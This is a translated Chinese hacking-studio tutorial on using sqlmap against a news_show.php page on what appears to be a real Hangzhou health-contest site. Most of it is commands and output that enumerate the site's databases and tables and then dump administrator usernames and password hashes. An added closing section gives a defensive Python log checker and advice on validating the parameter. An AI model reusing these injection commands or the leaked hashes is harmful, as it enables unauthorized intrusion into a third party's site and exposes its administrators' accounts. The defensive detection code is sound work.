╭──────────────────────────╮
Maoke Studio (猫客工作室) -- sincere, efficient, innovative; dare to think, dare to act, and strive to do our best!
╰──────────────────────────╯
>Instructor: 剑眉大侠 (QQ767501681)
>Tutorial title: MySQL injection with SqlMap

Injection point: http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5

List all database names

sqlmap.py -u http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5 --dbs

available databases [19]:
[*] aixing
[*] bus
[*] dedecmsv56gbk
[*] dedecmsv57gbk
[*] discuz7
[*] drupal72
[*] health
[*] hzbbs
[*] hzmall
[*] information_schema
[*] iweibo2
[*] man
[*] mlyask
[*] mysql
[*] newmall
[*] test
[*] ucenter
[*] xiaobaige
[*] xjzblog

Get the current database name

sqlmap.py -u http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5 --current-db

current database: 'health'

Get the current user name

sqlmap.py -u http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5 --current-user

current user: 'root@localhost'

Physical path: off; site and database hosted separately

List all tables

sqlmap.py -u http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5 --tables -D health

[36 tables]
+---------------------+
| hl_admin            |
| hl_admintype        |
| hl_area             |
| hl_attachments      |
| hl_attachmenttypes  |
| hl_bespeak          |
| hl_bespeak_sign     |
| hl_bespoken         |
| hl_categories       |
| hl_comments         |
| hl_disease          |
| hl_doctor           |
| hl_hospital         |
| hl_indexpic         |
| hl_indexpiccate     |
| hl_items            |
| hl_items_new        |
| hl_jkzsds           |
| hl_jkzsds2_answer   |
| hl_jkzsds2_news     |
| hl_jkzsds2_question |
| hl_jkzsds2_school   |
| hl_jkzsds2_survey   |
| hl_jkzsds_hi        |
| hl_jkzsds_hi_bak    |
| hl_jkzsds_hi_bak1   |
| hl_jkzsds_new       |
| hl_jkzsds_tmp       |
| hl_question         |
| hl_section          |
| hl_shop             |
| hl_tag              |
| hl_tags             |
| hl_womandao         |
| hl_womandao_cate    |
| hl_womandao_pic     |
+---------------------+

List all columns

sqlmap.py -u http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5 --columns -T hl_admin -D health

+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| adminid    | smallint(6) unsigned |
| email      | varchar(50)          |
| loginip    | varchar(20)          |
| logintime  | int(11)              |
| logintimes | int(11) unsigned     |
| name       | varchar(30)          |
| password   | varchar(32)          |
| status     | enum('1','2')        |
| username   | varchar(30)          |
| usertype   | smallint(6) unsigned |
+------------+----------------------+

Dump column contents

sqlmap.py -u http://2012jkzsds.hangzhou.com.cn/news_show.php?nid=5 --dump -C username,password -T hl_admin -D health

username,password
+--------------------------+------------+
| password                 | username   |
+--------------------------+------------+
| 76419c58730d9f35de7ac538 | admin      |
| 21218cca77804d2ba1922c33 | nvxing     |
| 183b95c41222849a39a1cbf5 | SmokingBan |
| e10adc3949ba59abbe56e057 | meijie     |
| e10adc3949ba59abbe56e057 | benqktc    |
| e10adc3949ba59abbe56e057 | mon        |
+--------------------------+------------+

More command usage:
http://wenku.baidu.com/link?url=eMzrblqUDfXDaosGNkAKnthsT4AA79BEgd5XUnD624yqefBbHaqZk-lVx3pns2M6tApuP7bbNYpPTHGBgiCxdutlUKFGtdmJj80usI2nBuS
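
Added example (not part of the original tutorial): a defender-side check over web access logs for the kind of activity shown above. It flags requests whose nid value on news_show.php is not a plain integer and requests carrying sqlmap's default User-Agent prefix; the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /news_show.php?nid=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news_show.php?nid=5 HTTP/1.1" 200 5120 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news_show.php?nid=5%20AND%207=7 HTTP/1.1" 200 5120 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /news_show.php?nid=5%20AND%207=8 HTTP/1.1" 200 812 "-" "sqlmap/1.7 (https://sqlmap.org)"
192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /news_show.php?nid=5%27 HTTP/1.1" 500 300 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /news_show.php?nid=12 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def classify(line):
    """Return (ip, reasons) for one log line; reasons is empty if nothing matched."""
    m = LINE_RE.match(line)
    if not m:
        return None, []
    reasons = []
    if m["ua"].lower().startswith("sqlmap/"):      # default UA prefix, client-controlled
        reasons.append("sqlmap-user-agent")
    url = urlsplit(m["target"])
    if url.path.endswith("/news_show.php"):
        for value in parse_qs(url.query, keep_blank_values=True).get("nid", []):
            if not re.fullmatch(r"[0-9]+", value):  # nid is a numeric id on this page
                reasons.append("non-numeric-nid")
    return m["ip"], reasons

def suspicious_sources(log_text):
    """Aggregate the distinct reasons seen per source IP."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        ip, reasons = classify(line)
        for reason in reasons:
            hits[ip].add(reason)
    return {ip: sorted(found) for ip, found in hits.items()}

if __name__ == "__main__":
    for ip, found in suspicious_sources(SAMPLE_LOG).items():
        print(ip, found)
```

The User-Agent is set by the client, so the non-numeric nid check is the more durable signal. The same integer check applied in the application before the query is built closes the injection point.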